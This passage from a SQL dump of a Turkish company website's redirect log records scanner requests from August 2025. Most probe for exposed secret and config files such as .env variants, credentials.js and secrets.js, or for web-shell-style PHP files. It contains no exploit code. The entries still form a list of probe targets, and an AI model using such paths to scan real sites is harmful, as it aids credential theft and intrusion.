00:00:00',301),(45858,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentytwo/js/config.js',NULL,'','',1,0,'2025-08-28 21:43:18','0000-00-00 00:00:00',301),(45859,'http://3s-technologies.com.tr/en/.env.js',NULL,'','',1,0,'2025-08-28 21:43:25','0000-00-00 00:00:00',301),(45860,'http://3s-technologies.com.tr/en/dist/chunks.js',NULL,'','',1,0,'2025-08-28 21:43:30','0000-00-00 00:00:00',301),(45861,'http://3s-technologies.com.tr/en/gruntfile.js',NULL,'','',1,0,'2025-08-28 21:43:33','0000-00-00 00:00:00',301),(45862,'http://3s-technologies.com.tr/en/wp-includes/js/admin.js',NULL,'','',1,0,'2025-08-28 21:43:38','0000-00-00 00:00:00',301),(45863,'http://3s-technologies.com.tr/en/environment.js',NULL,'','',1,0,'2025-08-28 21:43:42','0000-00-00 00:00:00',301),(45864,'http://3s-technologies.com.tr/en/public/js/app.js',NULL,'','',1,0,'2025-08-28 21:43:47','0000-00-00 00:00:00',301),(45865,'http://3s-technologies.com.tr/en/composer.json.js',NULL,'','',1,0,'2025-08-28 21:43:52','0000-00-00 00:00:00',301),(45866,'http://3s-technologies.com.tr/en/wp-content/themes/elementor/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:02','0000-00-00 00:00:00',301),(45867,'http://3s-technologies.com.tr/en/package.json.js',NULL,'','',1,0,'2025-08-28 21:44:04','0000-00-00 00:00:00',301),(45868,'http://3s-technologies.com.tr/en/protractor.conf.js',NULL,'','',1,0,'2025-08-28 21:44:09','0000-00-00 00:00:00',301),(45869,'http://3s-technologies.com.tr/en/karma.conf.js',NULL,'','',1,0,'2025-08-28 21:44:12','0000-00-00 00:00:00',301),(45870,'http://3s-technologies.com.tr/en/build/js/app.js',NULL,'','',1,0,'2025-08-28 21:44:16','0000-00-00 00:00:00',301),(45871,'http://3s-technologies.com.tr/en/js/constants.js',NULL,'','',1,0,'2025-08-28 21:44:19','0000-00-00 00:00:00',301),(45872,'http://3s-technologies.com.tr/en/wp-content/themes/blocksy/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:28','0000-00-00 00:00:00',301),(45873,'http://3s-technologies.com.tr/en/usr/local/apache2/htdocs/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:30','0000-00-00 00:00:00',301),(45874,'http://3s-technologies.com.tr/en/public/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:31','0000-00-00 00:00:00',301),(45875,'http://3s-technologies.com.tr/en/mongodb-admin/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:33','0000-00-00 00:00:00',301),(45876,'http://3s-technologies.com.tr/en/js/helpers.js',NULL,'','',1,0,'2025-08-28 21:44:37','0000-00-00 00:00:00',301),(45877,'http://3s-technologies.com.tr/en/js/main.js',NULL,'','',1,0,'2025-08-28 21:44:40','0000-00-00 00:00:00',301),(45878,'http://3s-technologies.com.tr/en/usr/local/nginx/html/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:42','0000-00-00 00:00:00',301),(45879,'http://3s-technologies.com.tr/en/dist/bundle.js',NULL,'','',1,0,'2025-08-28 21:44:46','0000-00-00 00:00:00',301),(45880,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyone/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:49','0000-00-00 00:00:00',301),(45881,'http://3s-technologies.com.tr/en/dist/main.js',NULL,'','',1,0,'2025-08-28 21:44:51','0000-00-00 00:00:00',301),(45882,'http://3s-technologies.com.tr/en/dist/polyfills.js',NULL,'','',1,0,'2025-08-28 21:44:52','0000-00-00 00:00:00',301),(45883,'http://3s-technologies.com.tr/en/home/public_html/js/config.js',NULL,'','',1,0,'2025-08-28 21:44:53','0000-00-00 00:00:00',301),(45884,'http://3s-technologies.com.tr/en/js/app.js',NULL,'','',1,0,'2025-08-28 21:44:56','0000-00-00 00:00:00',301),(45885,'http://3s-technologies.com.tr/en/wp-content/themes/oceanwp/js/config.js',NULL,'','',1,0,'2025-08-28 21:45:04','0000-00-00 00:00:00',301),(45886,'http://3s-technologies.com.tr/en/js/env.js',NULL,'','',1,0,'2025-08-28 21:45:06','0000-00-00 00:00:00',301),(45887,'http://3s-technologies.com.tr/en/storage/framework/views/config.js',NULL,'','',1,0,'2025-08-28 21:45:08','0000-00-00 00:00:00',301),(45888,'http://3s-technologies.com.tr/en/js/chunk-common.js',NULL,'','',1,0,'2025-08-28 21:45:10','0000-00-00 00:00:00',301),(45889,'http://3s-technologies.com.tr/en/cpanel/js/config.js',NULL,'','',1,0,'2025-08-28 21:45:12','0000-00-00 00:00:00',301),(45890,'http://3s-technologies.com.tr/en/wp-content/themes/avada/js/config.js',NULL,'','',1,0,'2025-08-28 21:45:14','0000-00-00 00:00:00',301),(45891,'http://3s-technologies.com.tr/en/dist/app.js',NULL,'','',1,0,'2025-08-28 21:45:25','0000-00-00 00:00:00',301),(45892,'http://3s-technologies.com.tr/en/apache/conf/config.js',NULL,'','',1,0,'2025-08-28 21:45:28','0000-00-00 00:00:00',301),(45893,'http://3s-technologies.com.tr/en/wp-content/themes/astra/js/config.js',NULL,'','',1,0,'2025-08-28 21:45:31','0000-00-00 00:00:00',301),(45894,'http://3s-technologies.com.tr/en/config/database.js',NULL,'','',1,0,'2025-08-28 21:45:40','0000-00-00 00:00:00',301),(45895,'http://3s-technologies.com.tr/en/public/mix-manifest.json',NULL,'','',1,0,'2025-08-28 21:45:42','0000-00-00 00:00:00',301),(45896,'http://3s-technologies.com.tr/en/dist/js/chunk-vendors.js',NULL,'','',1,0,'2025-08-28 21:45:43','0000-00-00 00:00:00',301),(45897,'http://3s-technologies.com.tr/en/.env.development.js',NULL,'','',1,0,'2025-08-28 21:45:44','0000-00-00 00:00:00',301),(45898,'http://3s-technologies.com.tr/en/.env.local.js',NULL,'','',1,0,'2025-08-28 21:45:48','0000-00-00 00:00:00',301),(45899,'http://3s-technologies.com.tr/en/dist/runtime.js',NULL,'','',1,0,'2025-08-28 21:45:51','0000-00-00 00:00:00',301),(45900,'http://3s-technologies.com.tr/en/build/config.js',NULL,'','',1,0,'2025-08-28 21:45:57','0000-00-00 00:00:00',301),(45901,'http://3s-technologies.com.tr/en/directadmin/js/config.js',NULL,'','',1,0,'2025-08-28 21:46:04','0000-00-00 00:00:00',301),(45902,'http://3s-technologies.com.tr/en/wp-content/themes/betheme/js/config.js',NULL,'','',1,0,'2025-08-28 21:46:11','0000-00-00 00:00:00',301),(45903,'http://3s-technologies.com.tr/en/wp-content/plugins/yoast-seo/js/admin.js',NULL,'','',1,0,'2025-08-28 21:46:17','0000-00-00 00:00:00',301),(45904,'http://3s-technologies.com.tr/en/yarn.lock.js',NULL,'','',1,0,'2025-08-28 21:46:19','0000-00-00 00:00:00',301),(45905,'http://3s-technologies.com.tr/en/iis/config.js',NULL,'','',1,0,'2025-08-28 21:46:25','0000-00-00 00:00:00',301),(45906,'http://3s-technologies.com.tr/en/config/app.js',NULL,'','',1,0,'2025-08-28 21:46:25','0000-00-00 00:00:00',301),(45907,'http://3s-technologies.com.tr/en/babel.config.js',NULL,'','',1,0,'2025-08-28 21:46:30','0000-00-00 00:00:00',301),(45908,'http://3s-technologies.com.tr/en/plesk/js/config.js',NULL,'','',1,0,'2025-08-28 21:46:34','0000-00-00 00:00:00',301),(45909,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/js/config.js',NULL,'','',1,0,'2025-08-28 21:46:58','0000-00-00 00:00:00',301),(45910,'http://3s-technologies.com.tr/en/opt/lampp/htdocs/js/config.js',NULL,'','',1,0,'2025-08-28 21:46:59','0000-00-00 00:00:00',301),(45911,'http://3s-technologies.com.tr/en/credentials.js',NULL,'','',1,0,'2025-08-28 21:47:02','0000-00-00 00:00:00',301),(45912,'http://3s-technologies.com.tr/en/wp-includes/js/config.js',NULL,'','',1,0,'2025-08-28 21:47:03','0000-00-00 00:00:00',301),(45913,'http://3s-technologies.com.tr/en/wp-content/themes/storefront/js/config.js',NULL,'','',1,0,'2025-08-28 21:47:07','0000-00-00 00:00:00',301),(45914,'http://3s-technologies.com.tr/en/control/js/config.js',NULL,'','',1,0,'2025-08-28 21:47:15','0000-00-00 00:00:00',301),(45915,'http://3s-technologies.com.tr/en/nginx/conf/config.js',NULL,'','',1,0,'2025-08-28 21:47:19','0000-00-00 00:00:00',301),(45916,'http://3s-technologies.com.tr/en/js/script.js',NULL,'','',1,0,'2025-08-28 21:47:23','0000-00-00 00:00:00',301),(45917,'http://3s-technologies.com.tr/en/wwwroot/js/app.js',NULL,'','',1,0,'2025-08-28 21:47:25','0000-00-00 00:00:00',301),(45918,'http://3s-technologies.com.tr/en/.env.test.js',NULL,'','',1,0,'2025-08-28 21:47:28','0000-00-00 00:00:00',301),(45919,'http://3s-technologies.com.tr/en/gulpfile.js',NULL,'','',1,0,'2025-08-28 21:47:34','0000-00-00 00:00:00',301),(45920,'http://3s-technologies.com.tr/en/dist/config.js',NULL,'','',1,0,'2025-08-28 21:47:43','0000-00-00 00:00:00',301),(45921,'http://3s-technologies.com.tr/en/config/mail.js',NULL,'','',1,0,'2025-08-28 21:47:43','0000-00-00 00:00:00',301),(45922,'http://3s-technologies.com.tr/en/artisan/config.js',NULL,'','',1,0,'2025-08-28 21:47:49','0000-00-00 00:00:00',301),(45923,'http://3s-technologies.com.tr/en/backend/js/config.js',NULL,'','',1,0,'2025-08-28 21:47:52','0000-00-00 00:00:00',301),(45924,'http://3s-technologies.com.tr/en/wp-admin/js/user.js',NULL,'','',1,0,'2025-08-28 21:47:53','0000-00-00 00:00:00',301),(45925,'http://3s-technologies.com.tr/en/wp-admin/js/config.js',NULL,'','',1,0,'2025-08-28 21:47:58','0000-00-00 00:00:00',301),(45926,'http://3s-technologies.com.tr/en/mysql/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:02','0000-00-00 00:00:00',301),(45927,'http://3s-technologies.com.tr/en/pgadmin/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:05','0000-00-00 00:00:00',301),(45928,'http://3s-technologies.com.tr/en/js/chunk-vendors.js',NULL,'','',1,0,'2025-08-28 21:48:10','0000-00-00 00:00:00',301),(45929,'http://3s-technologies.com.tr/en/config/services.js',NULL,'','',1,0,'2025-08-28 21:48:13','0000-00-00 00:00:00',301),(45930,'http://3s-technologies.com.tr/en/wp-content/themes/neve/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:19','0000-00-00 00:00:00',301),(45931,'http://3s-technologies.com.tr/en/styles.js',NULL,'','',1,0,'2025-08-28 21:48:22','0000-00-00 00:00:00',301),(45932,'http://3s-technologies.com.tr/en/cypress.json.js',NULL,'','',1,0,'2025-08-28 21:48:26','0000-00-00 00:00:00',301),(45933,'http://3s-technologies.com.tr/en/wp-content/plugins/contact-form-7/includes/js/admin.js',NULL,'','',1,0,'2025-08-28 21:48:35','0000-00-00 00:00:00',301),(45934,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentythree/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:38','0000-00-00 00:00:00',301),(45935,'http://3s-technologies.com.tr/en/js/common.js',NULL,'','',1,0,'2025-08-28 21:48:41','0000-00-00 00:00:00',301),(45936,'http://3s-technologies.com.tr/en/redis-admin/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:45','0000-00-00 00:00:00',301),(45937,'http://3s-technologies.com.tr/en/.env.example.js',NULL,'','',1,0,'2025-08-28 21:48:46','0000-00-00 00:00:00',301),(45938,'http://3s-technologies.com.tr/en/wp-content/themes/divi/js/config.js',NULL,'','',1,0,'2025-08-28 21:48:48','0000-00-00 00:00:00',301),(45939,'http://3s-technologies.com.tr/en/js/utils.js',NULL,'','',1,0,'2025-08-28 21:49:07','0000-00-00 00:00:00',301),(45940,'http://3s-technologies.com.tr/en/dist/js/app.js',NULL,'','',1,0,'2025-08-28 21:49:08','0000-00-00 00:00:00',301),(45941,'http://3s-technologies.com.tr/en/runtime.js',NULL,'','',1,0,'2025-08-28 21:49:16','0000-00-00 00:00:00',301),(45942,'http://3s-technologies.com.tr/en/dashboard/js/config.js',NULL,'','',1,0,'2025-08-28 21:49:21','0000-00-00 00:00:00',301),(45943,'http://3s-technologies.com.tr/en/var/www/config.js',NULL,'','',1,0,'2025-08-28 21:49:25','0000-00-00 00:00:00',301),(45944,'http://3s-technologies.com.tr/en/jest.config.js',NULL,'','',1,0,'2025-08-28 21:49:27','0000-00-00 00:00:00',301),(45945,'http://3s-technologies.com.tr/en/wp-content/themes/generatepress/js/config.js',NULL,'','',1,0,'2025-08-28 21:49:31','0000-00-00 00:00:00',301),(45946,'http://3s-technologies.com.tr/en/wp-content/plugins/jetpack/js/config.js',NULL,'','',1,0,'2025-08-28 21:49:34','0000-00-00 00:00:00',301),(45947,'http://3s-technologies.com.tr/en/adminer/js/config.js',NULL,'','',1,0,'2025-08-28 21:49:40','0000-00-00 00:00:00',301),(45948,'http://3s-technologies.com.tr/en/config/cache.js',NULL,'','',1,0,'2025-08-28 21:49:43','0000-00-00 00:00:00',301),(45949,'http://3s-technologies.com.tr/en/dist/vendor.js',NULL,'','',1,0,'2025-08-28 21:49:57','0000-00-00 00:00:00',301),(45950,'http://3s-technologies.com.tr/en/etc/nginx/config.js',NULL,'','',1,0,'2025-08-28 21:49:59','0000-00-00 00:00:00',301),(45951,'http://3s-technologies.com.tr/en/usr/share/nginx/www/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:03','0000-00-00 00:00:00',301),(45952,'http://3s-technologies.com.tr/en/wp-content/plugins/contact-form-7/includes/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:05','0000-00-00 00:00:00',301),(45953,'http://3s-technologies.com.tr/en/js/core.js',NULL,'','',1,0,'2025-08-28 21:50:07','0000-00-00 00:00:00',301),(45954,'http://3s-technologies.com.tr/en/resources/js/components/config.js',NULL,'','',1,0,'2025-08-28 21:50:12','0000-00-00 00:00:00',301),(45955,'http://3s-technologies.com.tr/en/resources/views/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:19','0000-00-00 00:00:00',301),(45956,'http://3s-technologies.com.tr/en/public/js/admin.js',NULL,'','',1,0,'2025-08-28 21:50:23','0000-00-00 00:00:00',301),(45957,'http://3s-technologies.com.tr/en/etc/apache2/config.js',NULL,'','',1,0,'2025-08-28 21:50:25','0000-00-00 00:00:00',301),(45958,'http://3s-technologies.com.tr/en/panel/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:25','0000-00-00 00:00:00',301),(45959,'http://3s-technologies.com.tr/en/vendor.js',NULL,'','',1,0,'2025-08-28 21:50:26','0000-00-00 00:00:00',301),(45960,'http://3s-technologies.com.tr/en/keys.js',NULL,'','',1,0,'2025-08-28 21:50:27','0000-00-00 00:00:00',301),(45961,'http://3s-technologies.com.tr/en/public/js/main.js',NULL,'','',1,0,'2025-08-28 21:50:27','0000-00-00 00:00:00',301),(45962,'http://3s-technologies.com.tr/en/rollup.config.js',NULL,'','',1,0,'2025-08-28 21:50:28','0000-00-00 00:00:00',301),(45963,'http://3s-technologies.com.tr/en/wp-content/plugins/wordfence/js/admin.js',NULL,'','',1,0,'2025-08-28 21:50:30','0000-00-00 00:00:00',301),(45964,'http://3s-technologies.com.tr/en/storage/app/public/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:33','0000-00-00 00:00:00',301),(45965,'http://3s-technologies.com.tr/en/js/auth.js',NULL,'','',1,0,'2025-08-28 21:50:33','0000-00-00 00:00:00',301),(45966,'http://3s-technologies.com.tr/en/database/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:34','0000-00-00 00:00:00',301),(45967,'http://3s-technologies.com.tr/en/usr/share/nginx/html/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:35','0000-00-00 00:00:00',301),(45968,'http://3s-technologies.com.tr/en/.env.production.js',NULL,'','',1,0,'2025-08-28 21:50:36','0000-00-00 00:00:00',301),(45969,'http://3s-technologies.com.tr/en/.envrc.js',NULL,'','',1,0,'2025-08-28 21:50:36','0000-00-00 00:00:00',301),(45970,'http://3s-technologies.com.tr/en/js/admin.js',NULL,'','',1,0,'2025-08-28 21:50:39','0000-00-00 00:00:00',301),(45971,'http://3s-technologies.com.tr/en/admin/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:40','0000-00-00 00:00:00',301),(45972,'http://3s-technologies.com.tr/en/polyfills.js',NULL,'','',1,0,'2025-08-28 21:50:41','0000-00-00 00:00:00',301),(45973,'http://3s-technologies.com.tr/en/public/js/manifest.js',NULL,'','',1,0,'2025-08-28 21:50:42','0000-00-00 00:00:00',301),(45974,'http://3s-technologies.com.tr/en/cp/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:42','0000-00-00 00:00:00',301),(45975,'http://3s-technologies.com.tr/en/wp-content/themes/kadence/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:43','0000-00-00 00:00:00',301),(45976,'http://3s-technologies.com.tr/en/manage/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:44','0000-00-00 00:00:00',301),(45977,'http://3s-technologies.com.tr/en/db/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:47','0000-00-00 00:00:00',301),(45978,'http://3s-technologies.com.tr/en/dist/scripts.js',NULL,'','',1,0,'2025-08-28 21:50:48','0000-00-00 00:00:00',301),(45979,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentyfour/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:49','0000-00-00 00:00:00',301),(45980,'http://3s-technologies.com.tr/en/secrets.js',NULL,'','',1,0,'2025-08-28 21:50:51','0000-00-00 00:00:00',301),(45981,'http://3s-technologies.com.tr/en/js/functions.js',NULL,'','',1,0,'2025-08-28 21:50:52','0000-00-00 00:00:00',301),(45982,'http://3s-technologies.com.tr/en/console/js/config.js',NULL,'','',1,0,'2025-08-28 21:50:53','0000-00-00 00:00:00',301),(45983,'http://3s-technologies.com.tr/en/wp-admin/js/common.js',NULL,'','',1,0,'2025-08-28 21:50:55','0000-00-00 00:00:00',301),(45984,'http://3s-technologies.com.tr/en/src/config.js',NULL,'','',1,0,'2025-08-28 21:50:57','0000-00-00 00:00:00',301),(45985,'http://3s-technologies.com.tr/en/js/custom.js',NULL,'','',1,0,'2025-08-28 21:51:01','0000-00-00 00:00:00',301),(45986,'http://3s-technologies.com.tr/en/js/config.js',NULL,'','',1,0,'2025-08-28 21:51:02','0000-00-00 00:00:00',301),(45987,'http://3s-technologies.com.tr/en/admin/config.js',NULL,'','',1,0,'2025-08-28 21:51:05','0000-00-00 00:00:00',301),(45988,'http://3s-technologies.com.tr/en/wp-content/plugins/yoast-seo/js/config.js',NULL,'','',1,0,'2025-08-28 21:51:07','0000-00-00 00:00:00',301),(45989,'http://3s-technologies.com.tr/en/wp-admin/js/admin.js',NULL,'','',1,0,'2025-08-28 21:51:09','0000-00-00 00:00:00',301),(45990,'http://3s-technologies.com.tr/tr/maul.php',NULL,'','',18,0,'2025-08-29 07:08:55','0000-00-00 00:00:00',301),(45991,'http://mail.3s-technologies.com.tr/tr/skk.php',NULL,'','',1,0,'2025-08-29 10:10:41','0000-00-00 00:00:00',301),(45992,'http://mail.3s-technologies.com.tr/tr/fs.php',NULL,'','',56,0,'2025-08-29 10:10:42','0000-00-00 00:00:00',301),(45993,'http://mail.3s-technologies.com.tr/tr/nc.php',NULL,'','',10,0,'2025-08-29 10:10:43','0000-00-00 00:00:00',301),(45994,'http://mail.3s-technologies.com.tr/tr/.an5.php',NULL,'','',1,0,'2025-08-29 10:10:44','0000-00-00 00:00:00',301),(45995,'http://mail.3s-technologies.com.tr/tr/berm.php',NULL,'','',1,0,'2025-08-29 10:10:45','0000-00-00 00:00:00',301),(45996,'http://mail.3s-technologies.com.tr/tr/n1.php',NULL,'','',1,0,'2025-08-29 10:10:47','0000-00-00 00:00:00',301),(45997,'http://mail.3s-technologies.com.tr/tr/pn.php',NULL,'','',11,0,'2025-08-29 10:10:48','0000-00-00 00:00:00',301),(45998,'http://mail.3s-technologies.com.tr/tr/app.php',NULL,'','',18,0,'2025-08-29 10:10:49','0000-00-00 00:00:00',301),(45999,'http://mail.3s-technologies.com.tr/tr/re.php',NULL,'','',20,0,'2025-08-29 10:10:50','0000-00-00 00:00:00',301),(46000,'http://mail.3s-technologies.com.tr/tr/eva.php',NULL,'','',1,0,'2025-08-29 10:10:51','0000-00-00 00:00:00',301),(46001,'http://mail.3s-technologies.com.tr/tr/bq.php',NULL,'','',1,0,'2025-08-29 10:10:52','0000-00-00 00:00:00',301),(46002,'http://mail.3s-technologies.com.tr/tr/tarc.php',NULL,'','',1,0,'2025-08-29 10:10:54','0000-00-00 00:00:00',301),(46003,'http://mail.3s-technologies.com.tr/tr/ed35f.php',NULL,'','',2,0,'2025-08-29 10:10:55','0000-00-00 00:00:00',301),(46004,'http://mail.3s-technologies.com.tr/tr/ula.php',NULL,'','',3,0,'2025-08-29 10:10:56','0000-00-00 00:00:00',301),(46005,'http://mail.3s-technologies.com.tr/tr/wrt.php',NULL,'','',24,0,'2025-08-29 10:10:57','0000-00-00 00:00:00',301),(46006,'http://mail.3s-technologies.com.tr/tr/c451f.php',NULL,'','',2,0,'2025-08-29 10:10:58','0000-00-00 00:00:00',301),(46007,'http://mail.3s-technologies.com.tr/tr/efa4f.php',NULL,'','',1,0,'2025-08-29 10:10:59','0000-00-00 00:00:00',301),(46008,'http://mail.3s-technologies.com.tr/tr/suy.php',NULL,'','',2,0,'2025-08-29 10:11:00','0000-00-00 00:00:00',301),(46009,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/nbr.php',NULL,'','',1,0,'2025-08-29 10:11:01','0000-00-00 00:00:00',301),(46010,'http://mail.3s-technologies.com.tr/tr/gul.php',NULL,'','',2,0,'2025-08-29 10:11:02','0000-00-00 00:00:00',301),(46011,'http://mail.3s-technologies.com.tr/tr/shop.php',NULL,'','',6,0,'2025-08-29 10:11:02','0000-00-00 00:00:00',301),(46012,'http://mail.3s-technologies.com.tr/tr/log.php',NULL,'','',30,0,'2025-08-29 10:11:03','0000-00-00 00:00:00',301),(46013,'http://mail.3s-technologies.com.tr/tr/ker.php',NULL,'','',2,0,'2025-08-29 10:11:04','0000-00-00 00:00:00',301),(46014,'http://mail.3s-technologies.com.tr/tr/public/new2.php',NULL,'','',1,0,'2025-08-29 10:11:05','0000-00-00 00:00:00',301),(46015,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/hueman/404.php',NULL,'','',1,0,'2025-08-29 10:11:06','0000-00-00 00:00:00',301),(46016,'http://mail.3s-technologies.com.tr/tr/led.php',NULL,'','',4,0,'2025-08-29 10:11:07','0000-00-00 00:00:00',301),(46017,'http://mail.3s-technologies.com.tr/tr/nas.php',NULL,'','',2,0,'2025-08-29 10:11:08','0000-00-00 00:00:00',301),(46018,'http://mail.3s-technologies.com.tr/tr/loi.php',NULL,'','',2,0,'2025-08-29 10:11:09','0000-00-00 00:00:00',301),(46019,'http://3s-technologies.com.tr/tr/k90.php',NULL,'','',10,0,'2025-08-29 17:05:40','0000-00-00 00:00:00',301),(46020,'http://3s-technologies.com.tr/tr/file32.php',NULL,'','',39,0,'2025-08-29 17:06:32','0000-00-00 00:00:00',301),(46021,'http://3s-technologies.com.tr/tr/cla.php',NULL,'','',58,0,'2025-08-30 01:36:04','0000-00-00 00:00:00',301),(46022,'http://3s-technologies.com.tr/tr/gfile.php',NULL,'','',71,0,'2025-08-30 01:36:04','0000-00-00 00:00:00',301),(46023,'http://3s-technologies.com.tr/tr/great.php',NULL,'','',17,0,'2025-08-30 01:36:06','0000-00-00 00:00:00',301),(46024,'http://3s-technologies.com.tr/tr/lo.php',NULL,'','',20,0,'2025-08-30 01:36:10','0000-00-00 00:00:00',301),(46025,'https://www.3s-technologies.com.tr/tr/rs:fill:3840:3840:0:0/plain/https:/images.ctfassets.net/h0jtq0wdx190/3hivodbwvd7qcdxed53fx0/484ffd97340457cd7f1b954be06b5432/svg_webpage_xss.svg',NULL,'https://www.3s-technologies.com.tr/rs:fill:3840:3840:0:0/plain/https://images.ctfassets.net/h0jtq0wdx190/3HivOdbWvD7QCDXEd53fx0/484ffd97340457cd7f1b954be06b5432/SVG_WEBPAGE_XSS.svg','',5,0,'2025-08-30 01:45:33','0000-00-00 00:00:00',301),(46026,'http://3s-technologies.com.tr/tr/axe.php',NULL,'','',8,0,'2025-08-30 07:22:22','0000-00-00 00:00:00',301),(46027,'http://mail.3s-technologies.com.tr/tr/ahax.php',NULL,'','',40,0,'2025-08-30 08:42:11','0000-00-00 00:00:00',301),(46028,'http://mail.3s-technologies.com.tr/tr/new.php',NULL,'','',41,0,'2025-08-30 08:42:13','0000-00-00 00:00:00',301),(46029,'http://mail.3s-technologies.com.tr/tr/skj.php',NULL,'','',1,0,'2025-08-30 08:42:14','0000-00-00 00:00:00',301),(46030,'http://mail.3s-technologies.com.tr/tr/poj.php',NULL,'','',2,0,'2025-08-30 08:42:15','0000-00-00 00:00:00',301),(46031,'http://mail.3s-technologies.com.tr/tr/jpg.php',NULL,'','',3,0,'2025-08-30 08:42:15','0000-00-00 00:00:00',301),(46032,'http://mail.3s-technologies.com.tr/tr/lok.php',NULL,'','',2,0,'2025-08-30 08:42:16','0000-00-00 00:00:00',301),(46033,'http://mail.3s-technologies.com.tr/tr/wtu.php',NULL,'','',2,0,'2025-08-30 08:42:17','0000-00-00 00:00:00',301),(46034,'http://mail.3s-technologies.com.tr/tr/ota.php',NULL,'','',1,0,'2025-08-30 08:42:19','0000-00-00 00:00:00',301),(46035,'http://mail.3s-technologies.com.tr/tr/class-wp-header.php',NULL,'','',2,0,'2025-08-30 08:42:19','0000-00-00 00:00:00',301),(46036,'http://mail.3s-technologies.com.tr/tr/has.php',NULL,'','',3,0,'2025-08-30 08:42:20','0000-00-00 00:00:00',301),(46037,'http://mail.3s-technologies.com.tr/tr/sol.php',NULL,'','',2,0,'2025-08-30 08:42:21','0000-00-00 00:00:00',301),(46038,'http://mail.3s-technologies.com.tr/tr/ttw.php',NULL,'','',2,0,'2025-08-30 08:42:25','0000-00-00 00:00:00',301),(46039,'http://mail.3s-technologies.com.tr/tr/opss.php',NULL,'','',2,0,'2025-08-30 08:42:25','0000-00-00 00:00:00',301),(46040,'http://mail.3s-technologies.com.tr/tr/dox.php',NULL,'','',9,0,'2025-08-30 08:42:26','0000-00-00 00:00:00',301),(46041,'http://mail.3s-technologies.com.tr/tr/kal.php',NULL,'','',3,0,'2025-08-30 08:42:28','0000-00-00 00:00:00',301),(46042,'http://mail.3s-technologies.com.tr/tr/wp/sih.php',NULL,'','',3,0,'2025-08-30 08:42:29','0000-00-00 00:00:00',301),(46043,'http://mail.3s-technologies.com.tr/tr/new2.php',NULL,'','',5,0,'2025-08-30 08:42:30','0000-00-00 00:00:00',301),(46044,'http://mail.3s-technologies.com.tr/tr/dds.php',NULL,'','',2,0,'2025-08-30 08:42:31','0000-00-00 00:00:00',301),(46045,'http://mail.3s-technologies.com.tr/tr/wp-xml.php',NULL,'','',3,0,'2025-08-30 08:42:32','0000-00-00 00:00:00',301),(46046,'http://mail.3s-technologies.com.tr/tr/ssk.php',NULL,'','',2,0,'2025-08-30 08:42:33','0000-00-00 00:00:00',301),(46047,'http://mail.3s-technologies.com.tr/tr/nok.php',NULL,'','',2,0,'2025-08-30 08:42:34','0000-00-00 00:00:00',301),(46048,'http://mail.3s-technologies.com.tr/tr/haf.php',NULL,'','',2,0,'2025-08-30 08:42:34','0000-00-00 00:00:00',301),(46049,'http://mail.3s-technologies.com.tr/tr/new4.php',NULL,'','',61,0,'2025-08-30 08:42:35','0000-00-00 00:00:00',301),(46050,'http://mail.3s-technologies.com.tr/tr/sow.php',NULL,'','',2,0,'2025-08-30 08:42:36','0000-00-00 00:00:00',301),(46051,'http://mail.3s-technologies.com.tr/tr/tro.php',NULL,'','',2,0,'2025-08-30 08:42:37','0000-00-00 00:00:00',301),(46052,'http://mail.3s-technologies.com.tr/tr/ave.php',NULL,'','',16,0,'2025-08-30 08:42:38','0000-00-00 00:00:00',301),(46053,'http://mail.3s-technologies.com.tr/tr/sty.php',NULL,'','',20,0,'2025-08-30 08:42:38','0000-00-00 00:00:00',301),(46054,'http://mail.3s-technologies.com.tr/tr/pow.php',NULL,'','',2,0,'2025-08-30 08:42:39','0000-00-00 00:00:00',301),(46055,'http://mail.3s-technologies.com.tr/tr/zze.php',NULL,'','',3,0,'2025-08-30 08:42:40','0000-00-00 00:00:00',301),(46056,'http://mail.3s-technologies.com.tr/tr/dop.php',NULL,'','',2,0,'2025-08-30 08:42:42','0000-00-00 00:00:00',301),(46057,'http://mail.3s-technologies.com.tr/tr/ad24f.php',NULL,'','',1,0,'2025-08-30 08:42:43','0000-00-00 00:00:00',301),(46058,'http://mail.3s-technologies.com.tr/tr/wui.php',NULL,'','',2,0,'2025-08-30 08:42:44','0000-00-00 00:00:00',301),(46059,'http://mail.3s-technologies.com.tr/tr/num.php',NULL,'','',36,0,'2025-08-30 08:42:44','0000-00-00 00:00:00',301),(46060,'http://mail.3s-technologies.com.tr/tr/wto.php',NULL,'','',4,0,'2025-08-30 08:42:45','0000-00-00 00:00:00',301),(46061,'http://mail.3s-technologies.com.tr/tr/cms/niz.php',NULL,'','',2,0,'2025-08-30 08:42:46','0000-00-00 00:00:00',301),(46062,'http://mail.3s-technologies.com.tr/tr/gib.php',NULL,'','',6,0,'2025-08-30 08:42:47','0000-00-00 00:00:00',301),(46063,'http://mail.3s-technologies.com.tr/tr/73106.php',NULL,'','',1,0,'2025-08-30 08:42:48','0000-00-00 00:00:00',301),(46064,'http://mail.3s-technologies.com.tr/tr/show/asa.php',NULL,'','',1,0,'2025-08-30 08:42:49','0000-00-00 